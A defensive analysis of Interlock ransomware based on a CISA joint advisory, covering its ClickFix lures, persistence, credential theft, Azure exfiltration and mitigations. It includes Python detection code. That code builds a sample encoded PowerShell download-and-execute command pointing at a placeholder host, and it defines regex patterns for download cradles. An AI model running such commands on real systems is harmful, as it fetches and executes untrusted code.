Interlock ransomware has quickly ascended from a little-known name in late 2024 to a top-tier threat that’s been hammering organizations across North America and Europe through 2025. While other ransomware groups have faltered or faded, Interlock actors show a relentless willingness to innovate: skirting typical intrusion routes, targeting virtual infrastructure, and deploying a full arsenal of legitimate and malicious tools. As joint advisories from CISA, FBI, HHS, and MS-ISAC reveal, the group’s arsenal and methodology should push every Windows and hybrid cloud defender to reevaluate assumptions about ransomware defense.

Emerging Threat: Understanding Interlock’s Evolution and Uniqueness

Interlock’s rapid evolution is perhaps its most chilling feature. Since its first appearance in September 2024, the group has not only avoided relying solely on familiar techniques like phishing or brute-forcing RDP but also embraced rare tactics. Chief among these is a preference for “drive-by download” initial access—compromising legitimate websites so that even security-aware users can stumble into infection. In several cases, they supplement this technical prowess with a ClickFix social engineering scheme: luring victims with a fake CAPTCHA to trigger a malicious PowerShell script manually. As McAfee and HHS advisories warn, this type of hand-in-glove blending of “living off the land” scripts and user trickery is a rising theme in ransomware, previously seen in malware like Lumma Stealer and DarkGate.
Perhaps even more notable is Interlock’s focus on virtual machines, including encryptors built for both Windows and Linux, echoing concerns stoked by the rise of Rhysida and Akira ransomware families. While their encryptors have so far ignored workstations and physical servers, there is every reason to think this will change, given the actors’ opportunistic nature. Today’s VM-focused group could be tomorrow’s enterprise-wide destroyer.
A key point verified across multiple sources is Interlock’s double-extortion methodology. Not only do they encrypt data, but they also exfiltrate substantial amounts before ransoming, strengthening their leverage: pay up, or both your files and sensitive company data may hit the public web. This shift, now standard among leading ransomware groups, means the impact goes beyond lost productivity—it introduces regulatory, reputational, and legal risks that can far outstrip the ransom itself.

Initial Access: Innovative Deception

Interlock’s entry points are both sophisticated and, arguably, more dangerous than the industry standard. Unlike many ransomware gangs relying on basic phishing, Interlock frequently compromises legitimate websites to distribute their malware, making drive-by downloads [T1189] a primary initial access vector. According to Sekoia’s threat intelligence, they often disguise payloads as fake updates for browsers (Chrome, Edge) or, more recently, security software such as FortiClient, Ivanti Secure, GlobalProtect, and others. Upon a hapless employee’s download, a remote access trojan (RAT) is delivered, opening the door for lateral movement.
The ClickFix social engineering approach, detailed in advisories from McAfee and HHS, adds another layer of danger. Victims are faced with a convincingly designed fake CAPTCHA, which instructs them to copy and run a Base64-encoded PowerShell command using Windows’ Run dialog. The fact that this process requires intentional action from a user (copying, pasting, running a script) makes it harder to detect or block by routine anti-phishing measures, and it signals a growing sophistication in user manipulation unseen in many ransomware operations.

Execution and Persistence: A RAT-Infested Infrastructure

Once a foothold is achieved, the fake browser or update executable acts as a RAT, executing PowerShell scripts designed to establish persistent access. This includes dropping files in the Windows Startup folder [T1547.001] so that control survives every user login, and modifying registry run keys camouflaged as legitimate updaters (“Chrome Updater”) to evade both human scrutiny and automated detection mechanisms.
Investigations have found that these scripts often run additional reconnaissance commands—ranging from enumerating current users [T1033] and detailed system configurations [T1082], to running ARP table lookups [T1016] and mapping network drives—to lay out a complete attack roadmap. This layered recon not only speeds up lateral movement but also helps identify critical data and infrastructure for exfiltration and encryption.
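As an added example (not code from the advisory or from this post), the checks below apply the two patterns described above, the ClickFix-style encoded PowerShell launch and the updater-named Run key, to constructed Sysmon-style process and registry events; the field names follow Sysmon's event 1 and event 13 layout, the sample URL is a placeholder, and the benign SecurityHealth entry shows that a normal Run value is not flagged.

```python
import base64
import re
USER_WRITABLE = re.compile(r"\\(AppData|Temp|ProgramData|Users\\Public)\\", re.I)
SCRIPT_HOST = re.compile(r"powershell|pwsh|wscript|cscript|mshta|cmd\.exe", re.I)
DOWNLOAD_CRADLE = re.compile(r"Invoke-WebRequest|\biwr\b|DownloadString|Invoke-Expression|\biex\b", re.I)
ENCODED_ARG = re.compile(r"-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]+)", re.I)  # -e, -ec, -enc, -EncodedCommand

def decode_encoded_command(cmdline: str):
    """Return the payload of a -EncodedCommand argument (base64 of UTF-16LE text), or None."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def check_process(ev: dict) -> list:
    """Sysmon event 1 style record with Image, ParentImage and CommandLine."""
    findings = []
    if not re.search(r"\\(powershell|pwsh)\.exe$", ev["Image"], re.I):
        return findings
    decoded = decode_encoded_command(ev["CommandLine"])
    if decoded is None:
        return findings
    # ClickFix: the victim pastes the command into the Run dialog, so explorer.exe is the parent
    if ev["ParentImage"].lower().endswith("explorer.exe"):
        findings.append("encoded PowerShell launched from explorer.exe (Run-dialog/ClickFix pattern)")
    if DOWNLOAD_CRADLE.search(decoded):
        findings.append("decoded command contains a download-and-execute primitive")
    return findings

def check_registry(ev: dict) -> list:
    """Sysmon event 13 style record with TargetObject (key\\value name) and Details (data)."""
    findings = []
    if not re.search(r"\\CurrentVersion\\Run(?:Once)?\\", ev["TargetObject"], re.I):
        return findings
    name = ev["TargetObject"].rsplit("\\", 1)[-1]
    if re.search(r"updat", name, re.I) and USER_WRITABLE.search(ev["Details"]):
        findings.append(f"Run value '{name}' poses as an updater but starts from a user-writable path")
    if SCRIPT_HOST.search(ev["Details"]):
        findings.append(f"Run value '{name}' launches a script host")
    return findings

# Constructed sample events, not taken from the advisory; the URL is a placeholder (.invalid TLD).
SAMPLE_PAYLOAD = "Invoke-WebRequest http://fake-captcha.invalid/u | Invoke-Expression"
CLICKFIX_EVENT = {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "ParentImage": r"C:\Windows\explorer.exe",
                  "CommandLine": "powershell.exe -w hidden -enc " + base64.b64encode(SAMPLE_PAYLOAD.encode("utf-16-le")).decode()}
RUNKEY_EVENT = {"TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\Run\Chrome Updater",
                "Details": r'powershell.exe -w hidden -File "C:\Users\alice\AppData\Roaming\Chrome Updater\update.ps1"'}
BENIGN_RUNKEY_EVENT = {"TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SecurityHealth",
                       "Details": r"%windir%\system32\SecurityHealthSystray.exe"}
```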

Tools and Payloads: Playing Both Sides of the Line

Interlock’s arsenal includes both custom and off-the-shelf tools, some of them familiar to many IT professionals:
  • AnyDesk and ScreenConnect: Legitimate remote access utilities, often employed maliciously for persistent and stealthy remote control after credential capture.
  • Cobalt Strike and SystemBC: Framed as tools for penetration testing, they’re widely abused for command and control (C2) operations and payload delivery by criminal networks.
  • PowerShell, PSExec, PuTTY, WinSCP: Ubiquitous IT management and file transfer tools—trusted by admins and easily abused for lateral movement, data collection, and exfiltration.
  • Custom credential stealers and keyloggers: Tools like cht.exe (credential stealer) and klg.dll (keylogger), as well as information stealers like Lumma and Berserk Stealer, help harvest credentials and elevate privileges. These have been observed as late as February 2025, indicating ongoing adaptation, especially after law enforcement disrupted parts of the Lumma Stealer supply chain.
File hashes associated with Interlock operations (detailed in recent CISA advisories) should not automatically be assumed malicious, given how many legitimate tools are abused in their campaigns—a critical fact that defenders must remember to avoid blocking core business functions without due evidence.

Credential Access and Privilege Escalation: From Stealing Passwords to Owning Domains

Credential access is where Interlock excels in both breadth and depth. Upon gaining an initial foothold, actors deploy credential stealers and keyloggers to harvest stored credentials, monitor user keystrokes (conhost.txt masquerading as a legitimate file), and quickly expand their reach across the network. Notably, attacks leveraging information stealers like Lumma and Berserk have enabled both lateral movement and privilege escalation [T1078], allowing Interlock to compromise administrator accounts, often through techniques like Kerberoasting [T1558.003].
The group’s readiness to exploit Remote Desktop Protocol (RDP) [T1021.001], AnyDesk, PuTTY, and even cracked versions of remote support solutions such as ScreenConnect, strongly suggests that compromise of a single desktop or server can rapidly metastasize through an enterprise—even if multi-factor authentication (MFA) is inconsistently applied.

Data Collection and Exfiltration: The Azure Angle

While many ransomware groups focus purely on local file encryption, Interlock has demonstrated a keen awareness of enterprise cloud storage. They employ Azure Storage Explorer and AzCopy to examine and extract data from Microsoft Azure Storage accounts, uploading it to attacker-controlled blobs outside corporate boundaries. WinSCP and other SFTP/SCP tools provide alternative exfiltration routes when needed.
This focus on cloud resources means defenders who only watch on-premises traffic are dangerously exposed. Monitoring for anomalous access to cloud storage endpoints—especially large, unexpected uploads—should become standard practice, particularly for organizations with significant digital assets in Microsoft’s ecosystem.
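An added example, not from the advisory or this post: a small aggregation over constructed records shaped like Azure StorageBlobLogs rows (the field names and the corporate IP range are assumptions) that flags bulk blob reads only when the volume coincides with a caller outside the organisation or SAS-token authentication, since AzCopy and Storage Explorer are legitimate tools on their own.

```python
import ipaddress
import json
from collections import defaultdict
MiB = 2**20
# Assumptions, not from the advisory: the organisation's egress ranges and a read-volume threshold
# that a defender would tune to their own baseline.
CORPORATE_NETS = [ipaddress.ip_network("203.0.113.0/24")]
BULK_READ_BYTES = 500 * MiB
READ_OPS = {"GetBlob", "ListBlobs"}

def make_row(t, op, ip, agent, auth, size):
    return json.dumps({"TimeGenerated": t, "OperationName": op, "CallerIpAddress": ip,
                       "UserAgentHeader": agent, "AuthenticationType": auth, "ResponseBodySize": size})

# Constructed rows shaped like StorageBlobLogs records (field names assumed): an employee reading a
# large set via Storage Explorer from the office, then an AzCopy session pulling the same store
# from an outside address with a SAS token.
SAMPLE_LOG = "\n".join([
    make_row("2025-07-22T10:01:00Z", "ListBlobs", "203.0.113.7:51234", "Microsoft Azure Storage Explorer/1.x", "OAuth", 8192),
    make_row("2025-07-22T10:02:00Z", "GetBlob", "203.0.113.7:51235", "Microsoft Azure Storage Explorer/1.x", "OAuth", 600 * MiB),
    make_row("2025-07-22T10:05:00Z", "ListBlobs", "198.51.100.23:44010", "AzCopy/10.x", "SAS", 8192),
    make_row("2025-07-22T10:06:00Z", "GetBlob", "198.51.100.23:44011", "AzCopy/10.x", "SAS", 300 * MiB),
    make_row("2025-07-22T10:07:00Z", "GetBlob", "198.51.100.23:44012", "AzCopy/10.x", "SAS", 300 * MiB),
])

def is_corporate(ip: str) -> bool:
    return any(ipaddress.ip_address(ip) in net for net in CORPORATE_NETS)

def find_bulk_readers(log_text: str, threshold: int = BULK_READ_BYTES) -> list:
    """Sum read volume per (caller IP, client tool). Alert only when a bulk read also comes from
    outside the corporate ranges or rides on a SAS token: AzCopy and Storage Explorer are
    legitimate tools, so the tool name is reported in the alert but never used as the trigger."""
    groups = defaultdict(lambda: {"bytes": 0, "ops": 0, "auth": set()})
    for line in log_text.splitlines():
        r = json.loads(line)
        if r["OperationName"] not in READ_OPS:
            continue
        ip = r["CallerIpAddress"].rsplit(":", 1)[0]  # the logs record the caller as ip:port
        tool = r["UserAgentHeader"].split("/")[0]
        g = groups[(ip, tool)]
        g["bytes"] += r.get("ResponseBodySize", 0)
        g["ops"] += 1
        g["auth"].add(r["AuthenticationType"])
    alerts = []
    for (ip, tool), g in groups.items():
        if g["bytes"] < threshold:
            continue
        reasons = [why for why, hit in (("caller outside corporate egress ranges", not is_corporate(ip)),
                                        ("SAS-token authentication", "SAS" in g["auth"])) if hit]
        if reasons:
            alerts.append({"ip": ip, "tool": tool, "mib": g["bytes"] // MiB, "ops": g["ops"], "reasons": reasons})
    return alerts
```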

Impact: Double Extortion and the VM Focus

With reconnaissance and exfiltration complete, Interlock actors deploy a bespoke encryption binary (conhost.exe or similar), targeting primarily VMs (including FreeBSD, a move that sets Interlock apart from most ransomware groups that focus on Linux or ESXi environments). The ransomware leverages combined AES and RSA algorithms for robust encryption [T1486], nearly always leading to irretrievable loss of files absent the decryption key.
The double-extortion model—encrypt then threaten to leak exfiltrated data—adds a powerful pressure point. Victims receive a ransom note (!README!.txt), a unique code, and are told to open a Tor browser and contact the extortionists; only after communication are ransom demands (usually in Bitcoin) revealed. Failure to pay leads to public data leaks, historically carried out as promised, raising the stakes far beyond a recovery operation.
Experts warn that this approach ensures that, even with solid backups, organizations remain at risk for catastrophic data and brand damage if evidence of intellectual property or regulated data theft emerges.

MITRE Tactics and Techniques: A Roadmap for Defenders

Interlock operations, as meticulously mapped by the MITRE ATT&CK framework in the joint advisory, span nearly every phase of a modern cyber kill chain:
  • Initial Access: Tactics like drive-by compromise [T1189] and fake software updates—rare among major ransomware families.
  • Execution and Persistence: PowerShell and registry hijacking ensure resilience and camouflage.
  • Credential Access: Deployment of credential stealers and keyloggers, plus Kerberoasting for domain escalation.
  • Discovery, Lateral Movement, Collection: Systematic reconnaissance, lateral hops with RDP/PuTTY/AnyDesk, and collection from both local and cloud data stores.
  • Exfiltration: Use of AzCopy, WinSCP, and alternative protocols ensures multi-layered data theft.
  • Impact: Final-stage deployment of robust encryptors, file deletion for defense evasion [T1070.004], and extortionate pressure via leak threats.
This well-rounded, multi-stage process leaves few gaps, whatever the security posture of a typical small or midsize enterprise.

Notable Strengths of Interlock’s Ransomware Campaigns

  • Opportunistic Targeting: Actors cast a wide net across business and critical infrastructure sectors. As CISA and Sekoia both found, the use of drive-by compromise means nearly any organization with lax web filtering is at risk.
  • VM and Cloud Awareness: By focusing on VMs, especially in VMware and FreeBSD environments, Interlock attacks organizations’ most critical virtual resources, maximizing disruption. Their use of Azure-native tools for exfiltration is another advanced, enterprise-focused tactic.
  • Multi-Platform Capability: Windows, Linux, and FreeBSD encryptors are in concurrent use, thwarting “server monoculture” defenses.
  • Hybrid Social Engineering & Technical Tactics: The ClickFix approach is a worrying evolution; it bypasses spam filters and many email defense systems because it relies not on a single lure but on staged user interaction (e.g., a fake CAPTCHA that walks the victim through running a command).
  • Evasive Techniques: Registry and file masquerading, deletion of binaries/toolings after execution, and use of legitimate signed tools all complicate detection and forensic attribution.

Potential Weaknesses and Areas for Defensive Leverage

While formidable, Interlock’s techniques are not invulnerable:
  • Relies on User Interaction: Many initial access scenarios still depend on users downloading, copying, or running unknown content. Organizations with rigorous, ongoing security awareness training are better positioned to mitigate this.
  • Endpoint Detection Opportunities: Sophisticated EDR and timely OS patching can thwart many of their PowerShell-based persistence and lateral movement tactics.
  • Cloud Monitoring Blind Spots: The actors’ use of Azure-native tools for exfiltration is only effective if organizations lack robust cloud activity monitoring and alerts. Enhanced log analysis and anomaly detection on cloud platforms is key to catching data theft early.
  • Shadow IT Risks: The availability of cracked remote access tools like ScreenConnect means IT should inventory and vet any remote access or file transfer apps running on endpoints.

Recommendations: Hardening Defenses Against Interlock and Ransomware Alike

Following the cross-government recommendations is a minimum, but the Interlock playbook makes several things especially urgent for Windows and cloud-centric organizations:

1. Enhance DNS and Web Filtering

Drive-by downloads are preventable with robust filtering, denying access to known malicious or compromised domains.

2. Zero-Trust and Segmentation

Strict network segmentation, especially between VMs and user workstations, caps the damage potential if a single endpoint is compromised. Zero-trust policies help slow or block lateral movement.

3. Harden Credentials and MFA

Enforce NIST-standard passwords and require MFA on all remote, cloud, and admin interfaces—especially RDP, Azure, and remote management portals.

4. EDR and Behavioral Monitoring

Deploy advanced endpoint detection across all servers, VMs, and endpoints—with a focus on PowerShell, registry, startup folder, and cloud tool activity. Prioritize behavioral analytics over signature detection.

5. Comprehensive Backups and Immutable Storage

Maintain encrypted, immutable, and offline backups; rehearse restoration processes regularly, especially for virtual environments.

6. Drill and Validate Security Controls

Routinely stress-test all security controls with attack emulation mapped against MITRE ATT&CK techniques; focus on both detection and response.

7. Train, Then Train Again

Continue to educate employees on social engineering and the dangers of unexpected software updates and CAPTCHAs—addressing not just phishing, but more subtle user-targeted ruses.

8. Cloud Visibility

Adopt tools for continuous monitoring of cloud storage, focusing on unusual data movements and access by new or unauthorized accounts.

Critical Analysis and Industry Outlook

Interlock ransomware’s trajectory offers a troubling preview of the next generation of digital extortion threats. What sets this group apart is not any single technical breakthrough, but a fusion of innovation, agility, and ruthless pragmatism: they use whatever works—even if it means co-opting everyday IT tools, patiently crafting multi-step user deceptions, or focusing on infrastructure (VMs, cloud storage) that many defenders still treat as “second tier” compared to endpoints.
The potential for Interlock to expand its targeting beyond VMs—already hinted at in joint bulletins—should serve as an alarm bell for all sectors. Just because a threat group “hasn’t yet” attacked core servers or physical endpoints doesn’t mean they won’t. Indeed, attackers frequently use these preliminary campaigns to map new offensive strategies, adapt to changing defenses, or simply await a wider pool of victims.
Although Interlock is sophisticated and persistent, the group’s dependence on a blend of legitimate IT tools and human error means that robust, holistic cyber hygiene—including cloud, endpoint, and user-centric defenses—still offers considerable protection. Enterprises that ignore cloud data movement, under-fund employee security awareness, or delay implementation of least-privilege/MFA controls will be most vulnerable.
Yet, as ransomware attacks become more customized and extortion pressures increase through public leaks, recovery without a multi-layered, rigorously tested incident response plan grows increasingly unlikely. Paying the ransom remains a gamble, offering no guarantee of data recovery and risking further regulatory or criminal exposure—a point the authoring agencies continue, correctly, to emphasize.

The Road Ahead: Action Over Apathy

The Interlock campaign’s speed, polymorphism, and craft signal a move toward ransomware built not just for immediate profit, but for enduring disruption, brand destruction, and system-wide trauma. Every IT and security leader must treat the group’s techniques as a preview—not an outlier—of what’s to come from both criminal and nation-state ransomware operators.
To weather this new era, organizations must push beyond traditional, reactive approaches. That means not only following the latest joint advisories, but also demanding clearer cloud visibility, attacking insider threats with as much vigor as external ones, and testing every security control against real, mapped attacker behavior. The price of complacency in the face of Interlock is not just operational downtime—but potential extinction as a trusted digital entity.
For detailed indicators of compromise (IOCs), the latest hashes, and in-depth technical breakdowns, defenders should refer to the official advisories from CISA and trusted research partners, and regularly consult resources on StopRansomware.gov. Immediate action, continuous learning, and industry sharing remain some of the only reliable shields against what is, for now, one of the most dangerous ransomware families targeting Windows, hybrid, and cloud-centric organizations.

Source: #StopRansomware: Interlock (CISA joint advisory)
